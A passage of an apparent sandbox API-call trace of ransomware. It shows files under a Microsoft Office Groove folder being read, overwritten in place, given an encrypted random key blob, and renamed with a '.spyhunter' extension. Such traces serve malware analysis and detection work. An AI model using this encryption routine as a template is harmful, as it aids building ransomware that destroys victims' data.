0x16c [0107.769] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_right.gif") returned 102 [0107.769] StrStrW (lpFirst="button_right.gif", lpSrch=".txt") returned 0x0 [0107.769] GetProcessHeap () returned 0x2c0000 [0107.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0107.769] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb3c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248fb3c*=0x26e, lpOverlapped=0x0) returned 1 [0107.850] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffd92, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0107.850] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x26e, lpNumberOfBytesWritten=0x248fb3c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248fb3c*=0x26e, lpOverlapped=0x0) returned 1 [0107.850] GetProcessHeap () returned 0x2c0000 [0107.850] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0107.850] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0107.850] WriteFile (in: hFile=0x16c, lpBuffer=0x248fb7c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb3c, lpOverlapped=0x0 | out: lpBuffer=0x248fb7c*, lpNumberOfBytesWritten=0x248fb3c*=0x4, lpOverlapped=0x0) returned 1 [0107.850] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb3c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fb3c*=0x30, lpOverlapped=0x0) returned 1 [0107.850] CloseHandle (hObject=0x16c) returned 1 [0107.851] GetProcessHeap () returned 0x2c0000 [0107.851] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2dd0048 [0107.851] wnsprintfW (in: pszDest=0x2dd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_right.gif.spyhunter") returned 112 [0107.851] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_right.gif" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\button_right.gif"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\button_right.gif.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\button_right.gif.spyhunter")) returned 1 [0107.851] GetProcessHeap () returned 0x2c0000 [0107.851] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2dd0048 | out: hHeap=0x2c0000) returned 1 [0107.852] GetProcessHeap () returned 0x2c0000 [0107.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0107.852] GetProcessHeap () returned 0x2c0000 [0107.852] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cdf398 | out: hHeap=0x2c0000) returned 1 [0107.852] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb78 | out: pbBuffer=0x248fb78) returned 1 [0107.852] GetProcessHeap () returned 0x2c0000 [0107.852] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0107.852] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb70*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb70*=0x30) returned 1 [0107.852] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\TEXTBOX.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\textbox.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0107.852] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\TEXTBOX.JPG") returned 114 [0107.853] StrStrW (lpFirst="TEXTBOX.JPG", lpSrch=".txt") returned 0x0 [0107.853] GetProcessHeap () returned 0x2c0000 [0107.853] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0107.853] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb34, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248fb34*=0x2800, lpOverlapped=0x0) returned 1 [0108.200] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0108.200] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fb34, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248fb34*=0x2800, lpOverlapped=0x0) returned 1 [0108.200] GetProcessHeap () returned 0x2c0000 [0108.200] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0108.200] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0108.201] WriteFile (in: hFile=0x16c, lpBuffer=0x248fb74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb34, lpOverlapped=0x0 | out: lpBuffer=0x248fb74*, lpNumberOfBytesWritten=0x248fb34*=0x4, lpOverlapped=0x0) returned 1 [0108.201] WriteFile (in: hFile=0x16c, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb34, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fb34*=0x30, lpOverlapped=0x0) returned 1 [0108.201] CloseHandle (hObject=0x16c) returned 1 [0108.277] GetProcessHeap () returned 0x2c0000 [0108.277] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce0318 [0108.281] wnsprintfW (in: pszDest=0x2ce0318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\TEXTBOX.JPG.spyhunter") returned 124 [0108.281] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\TEXTBOX.JPG" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\textbox.jpg"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms\\FieldTypePreview\\TEXTBOX.JPG.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms\\fieldtypepreview\\textbox.jpg.spyhunter")) returned 1 [0108.281] GetProcessHeap () returned 0x2c0000 [0108.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce0318 | out: hHeap=0x2c0000) returned 1 [0108.281] GetProcessHeap () returned 0x2c0000 [0108.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0108.281] GetProcessHeap () returned 0x2c0000 [0108.281] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2cf1968 | out: hHeap=0x2c0000) returned 1 [0108.282] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb78 | out: pbBuffer=0x248fb78) returned 1 [0108.282] GetProcessHeap () returned 0x2c0000 [0108.282] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0108.282] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb70*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb70*=0x30) returned 1 [0108.282] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\view.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0108.290] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.ICO") returned 95 [0108.290] StrStrW (lpFirst="VIEW.ICO", lpSrch=".txt") returned 0x0 [0108.290] GetProcessHeap () returned 0x2c0000 [0108.290] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0108.290] ReadFile (in: hFile=0x154, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb34, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248fb34*=0x13e, lpOverlapped=0x0) returned 1 [0108.294] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0xfffffec2, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0108.294] WriteFile (in: hFile=0x154, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x13e, lpNumberOfBytesWritten=0x248fb34, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248fb34*=0x13e, lpOverlapped=0x0) returned 1 [0108.294] GetProcessHeap () returned 0x2c0000 [0108.294] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0108.294] SetFilePointerEx (in: hFile=0x154, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0108.294] WriteFile (in: hFile=0x154, lpBuffer=0x248fb74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb34, lpOverlapped=0x0 | out: lpBuffer=0x248fb74*, lpNumberOfBytesWritten=0x248fb34*=0x4, lpOverlapped=0x0) returned 1 [0108.294] WriteFile (in: hFile=0x154, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb34, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fb34*=0x30, lpOverlapped=0x0) returned 1 [0108.294] CloseHandle (hObject=0x154) returned 1 [0108.294] GetProcessHeap () returned 0x2c0000 [0108.295] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2ce0318 [0108.297] wnsprintfW (in: pszDest=0x2ce0318, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.ICO.spyhunter") returned 105 [0108.298] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.ICO" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\view.ico"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\VIEW.ICO.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\view.ico.spyhunter")) returned 1 [0108.298] GetProcessHeap () returned 0x2c0000 [0108.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ce0318 | out: hHeap=0x2c0000) returned 1 [0108.299] GetProcessHeap () returned 0x2c0000 [0108.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0108.299] GetProcessHeap () returned 0x2c0000 [0108.299] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b9508 | out: hHeap=0x2c0000) returned 1 [0108.299] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb70 | out: pbBuffer=0x248fb70) returned 1 [0108.299] GetProcessHeap () returned 0x2c0000 [0108.299] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0108.299] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb68*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb68*=0x30) returned 1 [0108.299] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\utilityfunctions.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\utilityfunctions.js"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0108.473] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\utilityfunctions.js") returned 106 [0108.473] StrStrW (lpFirst="utilityfunctions.js", lpSrch=".txt") returned 0x0 [0108.473] GetProcessHeap () returned 0x2c0000 [0108.473] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0108.474] ReadFile (in: hFile=0x178, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb2c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x248fb2c*=0x2800, lpOverlapped=0x0) returned 1 [0108.503] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0108.503] WriteFile (in: hFile=0x178, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fb2c, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x248fb2c*=0x2800, lpOverlapped=0x0) returned 1 [0108.503] GetProcessHeap () returned 0x2c0000 [0108.503] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0108.503] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0108.503] WriteFile (in: hFile=0x178, lpBuffer=0x248fb6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb2c, lpOverlapped=0x0 | out: lpBuffer=0x248fb6c*, lpNumberOfBytesWritten=0x248fb2c*=0x4, lpOverlapped=0x0) returned 1 [0108.558] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb2c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fb2c*=0x30, lpOverlapped=0x0) returned 1 [0108.559] CloseHandle (hObject=0x178) returned 1 [0108.559] GetProcessHeap () returned 0x2c0000 [0108.559] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e016b0 [0108.559] wnsprintfW (in: pszDest=0x2e016b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\utilityfunctions.js.spyhunter") returned 116 [0108.559] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\utilityfunctions.js" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\utilityfunctions.js"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms3\\utilityfunctions.js.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms3\\utilityfunctions.js.spyhunter")) returned 1 [0108.560] GetProcessHeap () returned 0x2c0000 [0108.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e016b0 | out: hHeap=0x2c0000) returned 1 [0108.560] GetProcessHeap () returned 0x2c0000 [0108.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0108.560] GetProcessHeap () returned 0x2c0000 [0108.560] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x319d80 | out: hHeap=0x2c0000) returned 1 [0108.560] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb70 | out: pbBuffer=0x248fb70) returned 1 [0108.560] GetProcessHeap () returned 0x2c0000 [0108.560] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0108.560] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb68*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb68*=0x30) returned 1 [0108.560] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Adobe.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\adobe.css"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0109.073] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Adobe.css") returned 108 [0109.073] StrStrW (lpFirst="Adobe.css", lpSrch=".txt") returned 0x0 [0109.073] GetProcessHeap () returned 0x2c0000 [0109.073] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0109.073] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb2c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248fb2c*=0x75f, lpOverlapped=0x0) returned 1 [0109.084] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff8a1, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.084] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x75f, lpNumberOfBytesWritten=0x248fb2c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248fb2c*=0x75f, lpOverlapped=0x0) returned 1 [0109.084] GetProcessHeap () returned 0x2c0000 [0109.084] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0109.084] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.084] WriteFile (in: hFile=0x178, lpBuffer=0x248fb6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb2c, lpOverlapped=0x0 | out: lpBuffer=0x248fb6c*, lpNumberOfBytesWritten=0x248fb2c*=0x4, lpOverlapped=0x0) returned 1 [0109.084] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb2c, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fb2c*=0x30, lpOverlapped=0x0) returned 1 [0109.085] CloseHandle (hObject=0x178) returned 1 [0109.085] GetProcessHeap () returned 0x2c0000 [0109.085] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e016b0 [0109.085] wnsprintfW (in: pszDest=0x2e016b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Adobe.css.spyhunter") returned 118 [0109.085] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Adobe.css" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\adobe.css"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsStyles\\Adobe.css.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsstyles\\adobe.css.spyhunter")) returned 1 [0109.086] GetProcessHeap () returned 0x2c0000 [0109.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e016b0 | out: hHeap=0x2c0000) returned 1 [0109.086] GetProcessHeap () returned 0x2c0000 [0109.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0109.086] GetProcessHeap () returned 0x2c0000 [0109.086] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e21870 | out: hHeap=0x2c0000) returned 1 [0109.086] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb68 | out: pbBuffer=0x248fb68) returned 1 [0109.086] GetProcessHeap () returned 0x2c0000 [0109.086] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0109.086] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb60*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb60*=0x30) returned 1 [0109.086] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsMacroTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsmacrotemplate.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0109.087] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsMacroTemplate.html") returned 110 [0109.087] StrStrW (lpFirst="FormsMacroTemplate.html", lpSrch=".txt") returned 0x0 [0109.087] GetProcessHeap () returned 0x2c0000 [0109.087] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0109.087] ReadFile (in: hFile=0x178, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fb24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x248fb24*=0x858, lpOverlapped=0x0) returned 1 [0109.103] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0xfffff7a8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0109.103] WriteFile (in: hFile=0x178, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x858, lpNumberOfBytesWritten=0x248fb24, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x248fb24*=0x858, lpOverlapped=0x0) returned 1 [0109.103] GetProcessHeap () returned 0x2c0000 [0109.103] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0109.103] SetFilePointerEx (in: hFile=0x178, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0109.104] WriteFile (in: hFile=0x178, lpBuffer=0x248fb64*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fb24, lpOverlapped=0x0 | out: lpBuffer=0x248fb64*, lpNumberOfBytesWritten=0x248fb24*=0x4, lpOverlapped=0x0) returned 1 [0109.104] WriteFile (in: hFile=0x178, lpBuffer=0x31f110*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fb24, lpOverlapped=0x0 | out: lpBuffer=0x31f110*, lpNumberOfBytesWritten=0x248fb24*=0x30, lpOverlapped=0x0) returned 1 [0109.104] CloseHandle (hObject=0x178) returned 1 [0109.104] GetProcessHeap () returned 0x2c0000 [0109.104] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2e016b0 [0109.104] wnsprintfW (in: pszDest=0x2e016b0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsMacroTemplate.html.spyhunter") returned 120 [0109.104] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsMacroTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsmacrotemplate.html"), lpNewFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsMacroTemplate.html.spyhunter" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsmacrotemplate.html.spyhunter")) returned 1 [0109.105] GetProcessHeap () returned 0x2c0000 [0109.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e016b0 | out: hHeap=0x2c0000) returned 1 [0109.105] GetProcessHeap () returned 0x2c0000 [0109.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f110 | out: hHeap=0x2c0000) returned 1 [0109.105] GetProcessHeap () returned 0x2c0000 [0109.105] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e21748 | out: hHeap=0x2c0000) returned 1 [0109.105] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fb68 | out: pbBuffer=0x248fb68) returned 1 [0109.105] GetProcessHeap () returned 0x2c0000 [0109.105] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f110 [0109.105] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f110*, pdwDataLen=0x248fb60*=0x20, dwBufLen=0x30 | out: pbData=0x31f110*, pdwDataLen=0x248fb60*=0x30) returned 1 [0109.106] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsImageTemplate.html" (normalized: "c:\\program files\\microsoft office\\office14\\groove\\tooldata\\groove.net\\grooveforms4\\formsimagetemplate.html"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0109.106] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Microsoft Office\\Office14\\Groove\\ToolData\\groove.net\\GrooveForms4\\FormsImageTemplate.html") returned 110 [0109.106] StrStrW (lpFirst="FormsImageTemplate.html", lpSrch=".txt") returned 0x0 [0109.106] GetProcessHeap () returned 0x2c0000 [0109.106] RtlAllocateHeap 